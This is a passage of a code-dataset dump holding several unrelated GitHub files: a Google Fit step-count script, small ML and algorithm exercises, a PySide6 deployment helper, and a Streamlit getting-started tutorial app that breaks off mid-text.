Now that we have the dataSourceIDs, let's call whichever by adding it to the end of the url\r\n url = \"https://www.googleapis.com/fitness/v1/users/me/dataSources/derived:com.google.step_count.delta:com.google.android.gms:merge_step_deltas\"\r\n\r\n -> so this is the json format the we got here, not the data\r\n -> if we want the actual data, we need to add at the end: /dataPointChanges\r\n url = \"https://www.googleapis.com/fitness/v1/users/me/dataSources/derived:com.google.step_count.delta:com.google.android.gms:merge_step_deltas/dataPointChanges\"\r\n\r\n 3.1.3 Let's get an excel where we get back the steps with dates\r\n\r\n SEE CODE BELOW -> comment out corresponding\r\n\r\n -> Visualize in excel -> Ask ChatGPT: \r\n 29-09-2023\t21\t51\r\n 29-09-2023\t21\t95\r\n 29-09-2023\t21\t88\r\n 29-09-2023\t21\t9\r\n 29-09-2023\t21\t74\r\n 29-09-2023\t21\t38\r\n 29-09-2023\t21\t22\r\n 29-09-2023\t21\t46\r\n \r\n This is my data\r\n\r\n I want a vba that adds together values in column c if in column b the values are same, and deletes the rows that it calculated from only keeping 1 row where the sum shows\r\n\r\n So for example:\r\n 29-09-2023\t21\t88\r\n 
29-09-2023\t21\t9\r\n\r\n the end result would be this:\r\n 29-09-2023\t21\t98\r\n\r\n -> F11 -> paste -> save ->F8 -> Run / Create a button for it in Excel Developer Module\r\n \r\n -> than in excel press F11 for instant chart view\r\n\r\n'''\r\n\r\n\r\nimport requests\r\nimport json\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\n\r\nACCESS_TOKEN = 'paste here from step 2.'\r\n\r\nurl = 'paste here from corresponding step'\r\n\r\nheaders = {\r\n \"Authorization\": f\"Bearer {ACCESS_TOKEN}\",\r\n \"Content-Type\": \"application/json\"\r\n}\r\n\r\n# Make the GET request\r\nresponse = requests.get(url, headers=headers)\r\n\r\n#STARTING POINT -> ONLY COMMENT THIS OUT, DONT DELETE!! ->\r\nif response.status_code == 200:\r\n # The request was successful, and you can work with the response data here\r\n data = response.json()\r\n # Pretty-print the JSON data\r\n print(json.dumps(data, indent=4))\r\nelse:\r\n # Handle the error or provide appropriate error handling\r\n print(f\"Request failed with status code: {response.status_code}\")\r\n\r\n\r\n#TESTs BELOW HERE->\r\n\r\n#3.1.1\r\n\"\"\" if response.status_code == 200: \r\n # The request was successful, and you can work with the response data here\r\n try:\r\n data = json.loads(response.content.decode('utf-8'))\r\n \r\n # Extract dataStreamId and corresponding name values\r\n data_stream_info = [(item[\"dataType\"].get(\"name\"), item.get(\"dataStreamId\")) for item in data[\"dataSource\"]]\r\n \r\n # Create a DataFrame from the extracted data\r\n df = pd.DataFrame(data_stream_info, columns=[\"Name\", \"ID\"])\r\n \r\n # Save the DataFrame to an Excel file\r\n df.to_excel(\"3.1 name - dataStreamID.xlsx\", index=False)\r\n \r\n print(\"Data saved to 3.1 name - dataStreamID.xlsx\")\r\n \r\n except json.JSONDecodeError as e:\r\n print(f\"Error decoding JSON response: {e}\") \"\"\"\r\n\r\n#3.1.3\r\n\"\"\" if response.status_code == 200:\r\n # The request was successful, and you can work with the response data here\r\n data = response.json()\r\n\r\n # Extract relevant information\r\n inserted_data = data.get(\"insertedDataPoint\", [])\r\n \r\n # Create lists to store extracted data\r\n start_times_day = []\r\n start_times_hour = []\r\n step_counts = []\r\n\r\n for entry in inserted_data:\r\n start_time_nanos = entry.get(\"startTimeNanos\")\r\n step_count = entry.get(\"value\", [{}])[0].get(\"intVal\")\r\n\r\n # Convert nanoseconds to a human-readable date-time format\r\n start_time_day = datetime.utcfromtimestamp(int(start_time_nanos) / 1e9).strftime('%d-%m-%Y')\r\n start_time_hour = datetime.utcfromtimestamp(int(start_time_nanos) / 1e9).strftime('%H')\r\n \r\n start_times_day.append(start_time_day)\r\n start_times_hour.append(start_time_hour)\r\n step_counts.append(step_count)\r\n\r\n # Create a DataFrame\r\n df = pd.DataFrame({\r\n \"Start DAY\": start_times_day,\r\n \"Start HOUR\": start_times_hour,\r\n \"Step Count\": step_counts\r\n })\r\n\r\n # Save the DataFrame to an Excel file\r\n df.to_excel(\"step_count_day_hour_2.xlsx\", index=False)\r\n \r\n print(\"Data saved to .xlsx\")\r\nelse:\r\n # Handle the error or provide appropriate error handling\r\n print(f\"Request failed with status code: {response.status_code}\") \"\"\"","repo_name":"laszlo678/health-api","sub_path":"3.1 Google Fit - Fitness API - Web.py","file_name":"3.1 Google Fit - Fitness API - Web.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} 
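The hour-level roll-up that the entry above hands off to an Excel VBA macro (summing column C wherever column B repeats) is an ordinary group-by, and the same script could do it in pandas before exporting. A minimal sketch, assuming the DataFrame and column names built in the step 3.1.3 snippet; the output filename is illustrative:

    hourly = (
        df.groupby(["Start DAY", "Start HOUR"], as_index=False)["Step Count"]
          .sum()  # one row per (day, hour) with summed steps, as the VBA loop produces
    )
    hourly.to_excel("step_count_hourly.xlsx", index=False)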
+{"seq_id":"29720712430","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.metrics import f1_score, r2_score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import tree\nfrom joblib import dump, load\n\ndata = pd.read_csv(\"murb.csv\", sep=r'\\s*,\\s*', header=0, encoding='ascii', engine='python')\n\n# Shuffle Data\ndata = data.sample(frac=1)\n\n# Split into training and test data (80 and 20% each)\ntraining_data, test_data = np.split(data, [int(0.8 * len(data))])\n\n# Define X and Y\nX = training_data[['hour', 'month', 'average_power_for_condo', 'min_power_for_condo', 'max_power_for_condo']]\nX_test = test_data[['hour', 'month', 'average_power_for_condo', 'min_power_for_condo', 'max_power_for_condo']]\nY = training_data['power']\nY_test = test_data['power']\n\n# Fit Regression Model\n\nclf = tree.DecisionTreeRegressor()\n\n# Fit and Predict\nclf.fit(X, Y)\nY_predict = clf.predict(X_test)\n\n# Predictor scores\ntest = r2_score(Y_predict, Y_test)\ntest2 = cross_val_score(clf, X_test, Y_test)\nprint(test)\nprint(test2)\n\n# Export Model\ndump(clf, 'murb.csv.joblib')\n","repo_name":"Team-AC/EMS-Simulation","sub_path":"ml_models/murb_power_regression.py","file_name":"murb_power_regression.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"2303820859","text":"\"\"\"\nElectricity Bill Estimator\n\"\"\"\n\nprint(\"ELECTRICITY BILL ESTIMATOR PROGRAM\")\n\nkwh_price = float(input(\"Enter price per kWH in cents: \"))\ndaily_use = float(input(\"Enter daily use in kWH: \"))\nbill_days = float(input(\"Enter number of billing days: \"))\n\ntotal_bill = (daily_use * bill_days) * (kwh_price/100)\nprint(\"Estimated bill : $ {:.2f}\".format(total_bill))\n\n","repo_name":"geraldlcpd/cp1404_practicals","sub_path":"prac_01/electrical_bill.py","file_name":"electrical_bill.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71179722557","text":"misHijos = [\"erika\", \"luis alfonso\", \"Ramón\", \"Alex\", \"kiwi\",\n \"Maria Unpajote\", \"Bernarda\"]\nfor nombre in misHijos:\n print(f\"Mi hij@ es: {nombre}\")\n\n\nmisnumeritos = [1, 2, 123, -123, 123.323, 1]\nfor x in misnumeritos:\n print(f\"Mi num. 
es: {x}\")\n\nfor i in range(0, len(misnumeritos)):\n print(f\"Mi hijo num.{i} es: {misnumeritos[i]}\")\n\nx = 0\nwhile x < 10:\n print(x)\n # x = x + 1\n x += 1\n\nsquares = list(map(lambda x: x**2, range(10)))\nsquares2 = [x**2 for x in range(10)]\nprint(squares, squares2)\n","repo_name":"XxmonioxX/First_Python_Project","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19747741876","text":"from typing import List\n\n\ndef findDuplicate(nums: List[int]) -> int:\n slow = 0\n fast = 0\n while True:\n slow = nums[slow]\n fast = nums[nums[fast]]\n if slow == fast:\n break\n slow = 0\n while slow != fast:\n slow = nums[slow]\n fast = nums[fast]\n return slow\n\n\ndef main():\n nums = [1, 3, 4, 2, 2]\n print(\"Given Array: \", nums)\n print(\"Duplicate number \", str(findDuplicate(nums)))\n nums = [3, 1, 3, 4, 2]\n print(\"Given Array: \", nums)\n print(\"Duplicate number \", str(findDuplicate(nums)))\n\n\nmain()\n","repo_name":"tulasidamarla/leetcode","sub_path":"src/main/java/com/learning/leetcode/arrays/medium/FindDuplicate.py","file_name":"FindDuplicate.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26816685270","text":"from shavas_logger import *\n\nTOP = 'TOP'\nRIGHT = 'RIGHT'\nLEFT = 'LEFT'\nBOTTOM = 'BOTTOM'\n\nTOP_LEFT = 'TOP_LEFT'\nTOP_RIGHT = 'TOP_RIGHT'\nBOTTOM_LEFT = 'BOTTOM_LEFT'\nBOTTOM_RIGHT = 'BOTTOM_RIGHT'\n\nMAX_Y = 'max_Y'\nMAX_X = 'max_X'\nMIN_Y = 'min_Y'\nMIN_X = 'min_X'\n\nX = 'X'\nY = 'Y'\n\ndef getPixelsOfDrawing(image_array):\n drawing_pixels_holder = []\n BLACK = 50\n\n try:\n for row_index, row_values in enumerate(image_array):\n hasDrawingColor = hasRowBlackPixels(row_values, BLACK)\n\n if (hasDrawingColor == True):\n for column_index, column_value in enumerate(row_values):\n if (column_value <= BLACK):\n drawing_pixels_holder.append((row_index, column_index))\n except Exception as e:\n logError(f'> \\33[91m ERROR - GETTING PIXELS failed:\\33[0m {e}')\n\n return drawing_pixels_holder\n\ndef getMaxMinCornerValues(image_array):\n global MAX_Y, MAX_X, MIN_Y, MIN_X\n drawing_pixels_holder = getPixelsOfDrawing(image_array)\n\n try:\n max_Y = max(drawing_pixels_holder, key=lambda item: item[0])[0]\n\n max_X = max(drawing_pixels_holder, key=lambda item: item[1])[1]\n\n min_Y = min(drawing_pixels_holder, key=lambda item: item[0])[0]\n\n min_X = min(drawing_pixels_holder, key=lambda item: item[1])[1]\n except Exception as e:\n logError(f'> \\33[91m ERROR - MaxMin failed:\\33[0m {e}')\n\n return {MAX_Y: max_Y,\n MAX_X: max_X,\n MIN_Y: min_Y,\n MIN_X: min_X}\n\ndef getCornerDistancesDictionary(dictMaxMinCornerValues, image_array):\n global MAX_Y, MAX_X, MIN_Y, MIN_X\n global TOP, RIGHT, BOTTOM, LEFT\n distance_bottom = dictMaxMinCornerValues[MAX_Y]\n distance_right = dictMaxMinCornerValues[MAX_X]\n distance_top = dictMaxMinCornerValues[MIN_Y]\n distance_left = dictMaxMinCornerValues[MIN_X]\n\n cols, rows = getShapeInfo(image_array)\n\n distance_bottom = rows - distance_bottom\n distance_right = cols - distance_right\n\n # distances from pixel on canvas to its border\n return {BOTTOM: distance_bottom,\n RIGHT: distance_right,\n TOP: distance_top,\n LEFT: distance_left}\n\ndef getCornersOfDrawingFrame(dictMaxMinCornerValues):\n global MAX_Y, MAX_X, MIN_Y, MIN_X\n global TOP_LEFT, TOP_RIGHT, BOTTOM_LEFT, BOTTOM_RIGHT, X, Y\n # 
distances from origin\n return {\n TOP_LEFT: {X: dictMaxMinCornerValues[MIN_X],\n Y: dictMaxMinCornerValues[MIN_Y]},\n TOP_RIGHT: {X: dictMaxMinCornerValues[MAX_X],\n Y: dictMaxMinCornerValues[MIN_Y]},\n BOTTOM_LEFT: {X: dictMaxMinCornerValues[MIN_X],\n Y: dictMaxMinCornerValues[MAX_Y]},\n BOTTOM_RIGHT: {X: dictMaxMinCornerValues[MAX_X],\n Y: dictMaxMinCornerValues[MAX_Y]}\n }\n\ndef getShapeInfo(image_array):\n rows, cols = image_array.shape\n return (cols, rows)\n\ndef hasRowBlackPixels(row_values, val_to_check_for):\n return any(_val_of_line <= val_to_check_for for _val_of_line in row_values)","repo_name":"Jaqqen/ShaVas","sub_path":"backend/frame_drawing.py","file_name":"frame_drawing.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"27792108768","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Network(nn.Module):\n INPUT_CHANNELS = 3\n\n def __init__(self, board_size):\n super(Network, self).__init__()\n self.conv1 = nn.Conv2d(3, 8, 2, stride=1, padding=1)\n self.conv2 = nn.Conv2d(8, 16, 2, stride=1, padding=1)\n self.maxPool = nn.MaxPool2d(3, stride=1, padding=1)\n self.x1 = nn.Linear(3168, 256)\n self.x2 = nn.Linear(256, 4)\n self.out = nn.LogSoftmax()\n\n def forward(self, x):\n x = self.maxPool(self.conv1(x))\n x = self.maxPool(self.conv2(x))\n x = x.flatten(1)\n x = F.relu(self.x1(x))\n x = F.relu(self.x2(x))\n return self.out(x)\n","repo_name":"c-mac/gym-rc-snake","sub_path":"agent/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"12459547287","text":"import ast\nimport logging\nimport os\nimport re\nimport sys\nimport warnings\nfrom typing import List\nfrom importlib import util\n\nif sys.version_info >= (3, 8):\n from importlib.metadata import version\nelse:\n from importlib_metadata import version\n\nfrom pathlib import Path\n\nfrom . import Config, Nuitka, run_command\n\nIMPORT_WARNING_PYSIDE = (f\"[DEPLOY] Found 'import PySide6' in file {0}\"\n \". 
Use 'from PySide6 import <module>' or pass the module\"\n \" needed using --extra-modules command line argument\")\n\n\ndef find_pyside_modules(project_dir: Path, extra_ignore_dirs: List[Path] = None,\n project_data=None):\n \"\"\"\n Searches all the python files in the project to find all the PySide modules used by\n the application.\n \"\"\"\n all_modules = set()\n mod_pattern = re.compile(\"PySide6.Qt(?P<mod_name>.*)\")\n\n def pyside_imports(py_file: Path):\n modules = []\n contents = py_file.read_text(encoding=\"utf-8\")\n try:\n tree = ast.parse(contents)\n for node in ast.walk(tree):\n if isinstance(node, ast.ImportFrom):\n main_mod_name = node.module\n if main_mod_name.startswith(\"PySide6\"):\n if main_mod_name == \"PySide6\":\n # considers 'from PySide6 import QtCore'\n for imported_module in node.names:\n full_mod_name = imported_module.name\n if full_mod_name.startswith(\"Qt\"):\n modules.append(full_mod_name[2:])\n continue\n\n # considers 'from PySide6.QtCore import Qt'\n match = mod_pattern.search(main_mod_name)\n if match:\n mod_name = match.group(\"mod_name\")\n modules.append(mod_name)\n else:\n logging.warning((\n f\"[DEPLOY] Unable to find module name from{ast.dump(node)}\"))\n\n if isinstance(node, ast.Import):\n for imported_module in node.names:\n full_mod_name = imported_module.name\n if full_mod_name == \"PySide6\":\n logging.warning(IMPORT_WARNING_PYSIDE.format(str(py_file)))\n except Exception as e:\n raise RuntimeError(f\"[DEPLOY] Finding module import failed on file {str(py_file)} with \"\n f\"error {e}\")\n\n return set(modules)\n\n py_candidates = []\n ignore_dirs = [\"__pycache__\", \"env\", \"venv\", \"deployment\"]\n\n if project_data:\n py_candidates = project_data.python_files\n ui_candidates = project_data.ui_files\n qrc_candidates = project_data.qrc_files\n ui_py_candidates = None\n qrc_ui_candidates = None\n\n if ui_candidates:\n ui_py_candidates = [(file.parent / f\"ui_{file.stem}.py\") for file in ui_candidates\n if (file.parent / f\"ui_{file.stem}.py\").exists()]\n\n if len(ui_py_candidates) != len(ui_candidates):\n warnings.warn(\"[DEPLOY] The number of uic files and their corresponding Python\"\n \" files don't match.\", category=RuntimeWarning)\n\n py_candidates.extend(ui_py_candidates)\n\n if qrc_candidates:\n qrc_ui_candidates = [(file.parent / f\"rc_{file.stem}.py\") for file in qrc_candidates\n if (file.parent / f\"rc_{file.stem}.py\").exists()]\n\n if len(qrc_ui_candidates) != len(qrc_candidates):\n warnings.warn(\"[DEPLOY] The number of qrc files and their corresponding Python\"\n \" files don't match.\", category=RuntimeWarning)\n\n py_candidates.extend(qrc_ui_candidates)\n\n for py_candidate in py_candidates:\n all_modules = all_modules.union(pyside_imports(py_candidate))\n return list(all_modules)\n\n # incase there is not .pyproject file, search all python files in project_dir, except\n # ignore_dirs\n if extra_ignore_dirs:\n ignore_dirs.extend(extra_ignore_dirs)\n\n # find relevant .py files\n _walk = os.walk(project_dir)\n for root, dirs, files in _walk:\n dirs[:] = [d for d in dirs if d not in ignore_dirs and not d.startswith(\".\")]\n for py_file in files:\n if py_file.endswith(\".py\"):\n py_candidates.append(Path(root) / py_file)\n\n for py_candidate in py_candidates:\n all_modules = all_modules.union(pyside_imports(py_candidate))\n\n if not all_modules:\n ValueError(\"[DEPLOY] No PySide6 modules were found\")\n\n return list(all_modules)\n\n\nclass PythonExecutable:\n \"\"\"\n Wrapper class around Python executable\n \"\"\"\n\n 
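    # Note: find_pyside_modules() above walks the AST rather than regex
    # matching raw text, so imports that only appear inside strings or
    # comments are never picked up. A minimal self-contained sketch of the
    # same pattern, with an illustrative source snippet:
    #
    #     import ast
    #     src = "from PySide6.QtCore import Qt\nfrom PySide6 import QtGui"
    #     found = set()
    #     for node in ast.walk(ast.parse(src)):
    #         if isinstance(node, ast.ImportFrom) and node.module.startswith("PySide6"):
    #             if node.module == "PySide6":
    #                 found.update(n.name[2:] for n in node.names if n.name.startswith("Qt"))
    #             else:
    #                 found.add(node.module.split(".Qt", 1)[1])
    #     assert found == {"Core", "Gui"}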
def __init__(self, python_path=None, dry_run=False):\n self.exe = python_path if python_path else Path(sys.executable)\n self.dry_run = dry_run\n self.nuitka = Nuitka(nuitka=[os.fspath(self.exe), \"-m\", \"nuitka\"])\n\n @property\n def exe(self):\n return Path(self._exe)\n\n @exe.setter\n def exe(self, exe):\n self._exe = exe\n\n @staticmethod\n def is_venv():\n venv = os.environ.get(\"VIRTUAL_ENV\")\n return True if venv else False\n\n def is_pyenv_python(self):\n pyenv_root = os.environ.get(\"PYENV_ROOT\")\n\n if pyenv_root:\n resolved_exe = self.exe.resolve()\n if str(resolved_exe).startswith(pyenv_root):\n return True\n\n return False\n\n def install(self, packages: list = None):\n _, installed_packages = run_command(command=[str(self.exe), \"-m\", \"pip\", \"freeze\"], dry_run=False\n , fetch_output=True)\n installed_packages = [p.decode().split('==')[0] for p in installed_packages.split()]\n for package in packages:\n package_info = package.split('==')\n package_components_len = len(package_info)\n package_name, package_version = None, None\n if package_components_len == 1:\n package_name = package_info[0]\n elif package_components_len == 2:\n package_name = package_info[0]\n package_version = package_info[1]\n else:\n raise ValueError(f\"{package} should be of the format 'package_name'=='version'\")\n if (package_name not in installed_packages) and (not self.is_installed(package_name)):\n logging.info(f\"[DEPLOY] Installing package: {package}\")\n run_command(\n command=[self.exe, \"-m\", \"pip\", \"install\", package],\n dry_run=self.dry_run,\n )\n elif package_version:\n installed_version = version(package_name)\n if package_version != installed_version:\n logging.info(f\"[DEPLOY] Installing package: {package_name}\"\n f\"version: {package_version}\")\n run_command(\n command=[self.exe, \"-m\", \"pip\", \"install\", \"--force\", package],\n dry_run=self.dry_run,\n )\n else:\n logging.info(f\"[DEPLOY] package: {package_name}=={package_version}\"\n \" already installed\")\n else:\n logging.info(f\"[DEPLOY] package: {package_name} already installed\")\n\n def is_installed(self, package):\n return bool(util.find_spec(package))\n\n def create_executable(self, source_file: Path, extra_args: str, config: Config):\n if config.qml_files:\n logging.info(f\"[DEPLOY] Included QML files: {config.qml_files}\")\n\n command_str = self.nuitka.create_executable(\n source_file=source_file,\n extra_args=extra_args,\n qml_files=config.qml_files,\n excluded_qml_plugins=config.excluded_qml_plugins,\n dry_run=self.dry_run,\n )\n\n return command_str\n","repo_name":"qtproject/pyside-pyside-setup","sub_path":"sources/pyside-tools/deploy_lib/python_helper.py","file_name":"python_helper.py","file_ext":"py","file_size_in_byte":8248,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"96"} +{"seq_id":"25922620630","text":"class Solution:\n def findRestaurant(self, list1: List[str], list2: List[str]) -> List[str]:\n n1 = len(list1)\n n2 = len(list2)\n \n temp = []\n \n for i in range(n1):\n for j in range(n2):\n if list1[i] == list2[j]:\n temp.append([list1[i], i+j])\n \n temp.sort(key=lambda restaurant: restaurant[1])\n \n MIN_INDEX_SUM = (temp[0])[1]\n m = len(temp)\n ret = []\n \n index = 0\n for i in range(m):\n if (temp[i])[1] == MIN_INDEX_SUM:\n ret.append((temp[i])[0])\n else:\n break\n\n return 
ret","repo_name":"hosjiu1702/LeetCode-Challenge","sub_path":"solutions/ex-73.py","file_name":"ex-73.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15816823312","text":"import numpy as np\n\ndef compute_bins(bin_params):\n\n bins = []\n\n for start, stop, nb_bins in bin_params: \n bins.append(np.linspace(start, stop, nb_bins))\n\n return bins\n\ndef distributions_from_labels(properties, labels, prop_bins, nb_classes=2):\n\n # distribution of fine classes P_p(Y = s)\n distr_s = []\n\n # list of distributions of property values P_p(C = c)\n distr_c = []\n\n # list of distribution per property P_p(C = c, Y = s)\n distr_joint = []\n\n for prop, bins in zip(properties, prop_bins):\n \n B = len(bins) - 1\n \n # ignore pixels with nan as property value in the stats. This is also why also P_p(s) depends on the property\n valid_idx = ~np.isnan(prop)\n valid_prop = prop[valid_idx]\n valid_labels = labels[valid_idx]\n nb_valid_points = len(valid_prop)\n \n hist_joint = np.zeros((nb_classes, B))\n hist_s = np.zeros(nb_classes)\n\n # get nb points per bin\n hist_c = np.histogram(valid_prop, bins=bins)[0]\n\n # loop over fine classes\n for s in range(nb_classes):\n\n s_labels = valid_labels == s\n hist_s[s] = np.sum(s_labels)\n\n hist_joint[s] = np.histogram(valid_prop[s_labels], bins=bins)[0]\n\n distr_joint.append(hist_joint / nb_valid_points)\n distr_s.append(hist_s / nb_valid_points)\n distr_c.append(hist_c / nb_valid_points)\n \n return distr_joint, distr_c, distr_s","repo_name":"vzantedeschi/fine-classification","sub_path":"src/property_analysis.py","file_name":"property_analysis.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19962909595","text":"import streamlit as st\nimport numpy as np\nimport pandas as pd\nimport altair as alt\n\nst.set_page_config(page_title=\"Streamlit Getting Started Guide\", initial_sidebar_state=\"expanded\")\n\nstate = st.get_state()\n\noptions = (\"🏃‍♀️Getting Started\",\n \"⬇️ Installing Streamlit\",\n \"🏗 Basic Functions\",\n \"🎨 Layout and Themes\",\n \"🏎 App Performance\",\n \"🚀 Deploying your App\",\n \"🎈 More Resources\")\n\nif state.nav is None:\n state.nav = options[0]\n\nnav = st.sidebar.selectbox(\"Choose a section\", options, key=\"nav\")\n\ndef on_next_click():\n state.nav = options[options.index(state.nav) + 1]\n\nif state.nav == \"🏃‍♀️Getting Started\":\n \"\"\"\n # Getting Started with Streamlit\n Welcome to Streamlit! 
Streamlit is an open-source framework for easily creating web apps in Python.\n Whether you want to show off your machine learning model, build an advanced analytics app, or create an internal tool, you can quickly make your app with Streamlit.\n\n Check out some examples and templates or go to [streamlit.io/gallery](streamlit.io/gallery) to browse many more.\n ##\n \"\"\"\n\n # img_col1, img_col2, img_col3 = st.beta_columns(3)\n #\n # with img_col1:\n # st.image(\"images/apps/demo-uber.png\", width=225)\n # st.markdown(\n # f'<p align=center><a href=\"https://share.streamlit.io/streamlit/demo-uber-nyc-pickups/\">Browse NYC Uber data</a></p>',\n # unsafe_allow_html=True,\n # )\n #\n # with img_col2:\n # st.image(\"images/apps/demo-gan.png\", width=225)\n # st.markdown(\n # f'<p align=center><a href=\"https://share.streamlit.io/streamlit/demo-face-gan\">Try out a GAN</a></p>',\n # unsafe_allow_html=True,\n # )\n #\n # with img_col3:\n # st.image(\"images/apps/demo-themes.png\", width=225)\n # st.markdown(\n # f'<p align=center><a href=\"https://share.streamlit.io/streamlit/theming-showcase/main\">See theming examples</a></p>',\n # unsafe_allow_html=True,\n # )\n\n # \"\"\"\n # ### Templates\n # \"\"\"\n\n template_col1, template_col2, template_col3 = st.beta_columns(3)\n\n with template_col1:\n st.image(\"images/apps/basic.png\", width=225)\n st.markdown(\n f'<p align=center><a href=\"https://share.streamlit.io/kellyamanda/templates/main/template_basic.py\">Basic layout with sidebar</a></p>',\n unsafe_allow_html=True,\n )\n\n with template_col2:\n st.image(\"images/apps/wide.png\", width=225)\n st.markdown(\n f'<p align=center><a href=\"https://share.streamlit.io/kellyamanda/templates/main/template_wide.py\">Wide mode layout</a></p>',\n unsafe_allow_html=True,\n )\n with template_col3:\n st.image(\"images/apps/demo-themes.png\", width=225)\n st.markdown(\n f'<p align=center><a href=\"https://share.streamlit.io/streamlit/theming-showcase/main\">Theming examples</a></p>',\n unsafe_allow_html=True,\n )\n # with template_col3:\n # st.image(\"images/apps/explainer.png\", width=225)\n # st.markdown(\n # f'<p align=center><a href=\"https://share.streamlit.io/kellyamanda/templates/main/template_explainer.py\">Explanation style layout</a></p>',\n # unsafe_allow_html=True,\n # )\n\n \"\"\"\n ##\n Ready to get set up? Click below for instructions on installing Streamlit. ⬇️\n \"\"\"\n st.button(\"Next > Install Streamlit\", on_click=on_next_click)\n\nif state.nav == \"⬇️ Installing Streamlit\":\n \"\"\"\n # Installing the Streamlit library\n ##\n \"\"\"\n\n install_col1, install_col2, install_col3 = st.beta_columns(3)\n install_code = \"pip install streamlit\"\n\n with install_col1:\n st.image(\"images/icons/windows.png\", width=57)\n st.subheader(\"Windows\")\n st.write(\"Some words about Windows and link to troubleshooting\")\n st.code(install_code, language=\"bash\")\n\n with install_col2:\n st.image(\"images/icons/mac.jpeg\", width=78)\n st.subheader(\"Mac\")\n st.write(\"Some words about Mac and link to troubleshooting\")\n st.code(install_code, language=\"bash\")\n\n with install_col3:\n st.image(\"images/icons/linux.png\", width=50)\n st.subheader(\"Linux\")\n st.write(\"Some words about Linux and link to troubleshooting\")\n st.code(install_code, language=\"bash\")\n\n \"\"\"\n #\n Ready to get into the code? Click below to learn about basic Streamlit functions. 
🏗\n \"\"\"\n st.button(\"Next > Basic Functions\", on_click=on_next_click)\n\nif state.nav == \"🏗 Basic Functions\":\n \"\"\"\n # Streamlit's basic functions\n There's a way to do just about anything you want with Streamlit, but here we'll introduce you\n to the basics of text, data, widgets, and visualizations. For more complex examples poke around on the\n [Streamlit forum](discuss.streamlit.io).\n\n ## Text\n Your basic functions for text are `st.title`, `st.header`, `st.subtitle`, and `st.write`.\n You can also use specialized functions like `st.markdown`, `st.text`, `st.code`, or `st.latex`. Here are some examples.\n \"\"\"\n\n with st.echo():\n st.subheader(\"Here's a subheader\")\n st.write(\"Here's some regular text with **bolding**\")\n\n \"\"\"\n #\n ## Data\n\n The easiest way to write data is just to use the `st.write` function. You can also use `st.table` or `st.dataframe` for different layouts.\n \"\"\"\n\n with st.echo():\n df = pd.DataFrame({\n 'first column': [1, 2, 3, 4],\n 'second column': [10, 20, 30, 40]\n })\n st.write(df)\n\n \"\"\"\n #\n ## Visualizing Data\n\n So much data visualization! For charts there are some basic functions in Streamlit color_picker `st.line_chart`\n and `st.map`, but Streamlit also supports Altair, PyPlot, Vega Lite, Plotly, Bokeh, PyDeck, Seaborn and more.\n Check out the docs for [all the charting types](https://docs.streamlit.io/en/stable/api.html?highlight=number_input#display-charts).\n \"\"\"\n with st.echo():\n df = pd.DataFrame(\n np.random.randn(200, 3),\n columns=['a', 'b', 'c'])\n\n st.subheader(\"Basic line chart\")\n st.line_chart(df)\n st.subheader(\"Altair chart\")\n c = alt.Chart(df).mark_circle().encode(\n x='a', y='b', size='c', color='c', tooltip=['a', 'b', 'c'])\n st.altair_chart(c, use_container_width=True)\n\n \"\"\"\n #\n ## Widgets\n\n Get your app interactive! Widgets are the core of building a great app. Streamlit offers a large number of widgets including\n `st.button`, `st.checkbox`, `st.radio`, `st.selectbox`, `st.multiselect`, `st.slider`, `st.text_input`, `st.date_input`, `st.number_input`, and [many more](https://docs.streamlit.io/en/stable/api.html#display-interactive-widgets).\n\n To use widgets, you just make a new variable and assign the value from the widget to it. Then you can use that to manipulate things in your app.\n \"\"\"\n\n with st.echo():\n number = st.slider(\"select a number\",1,100)\n emoji = st.radio(\"select emojis\",(\"🍩\",\"🦊\",\"🎈\",\"🐳\"))\n# emoji = st.selectbox(\"select emojis\",(\"🍩\",\"🦊\",\"🎈\",\"🐳\"), key=\"emoji\")\n# result = number * emoji\n# st.write(\"You have asked for \",number,\"of \", emoji,\": \")\n# st.write(result)\n \n\n \"\"\"\n #\n ## Media\n\n Use `st.image`, `st.video`, and `st.audio` to quickly add media to your app.\n \"\"\"\n\n with st.echo():\n st.subheader(\"Images\")\n st.image(\"https://rb.gy/2kdyzg\")\n\n st.subheader(\"Videos\")\n st.video(\"https://www.youtube.com/watch?v=IwOfCgkyEj0\")\n\n \"\"\"\n #\n Now that you know the basics, let's get into app layout and customization 🎨\n \"\"\"\n st.button(\"Next > Layout and Themes\", on_click=on_next_click)\n\nif state.nav == \"🎨 Layout and Themes\":\n \"\"\"\n # Layout and Theming for your app\n Now that you've mastered the basic functions, it's time to take your app to the next level by adding layout and themes.\n\n ## Sidebar\n The Sidebar is a great option for persistent text or controls for your app. To move something to the sidebar just append `st.sidebar` in front\n of the function. 
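    For instance, the very same slider moves from the main page into the sidebar with nothing but that prefix (a minimal sketch; the label and range are illustrative):

        st.slider("Select value", 1, 100)          # renders in the main page
        st.sidebar.slider("Select value", 1, 100)  # identical widget, in the sidebar
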
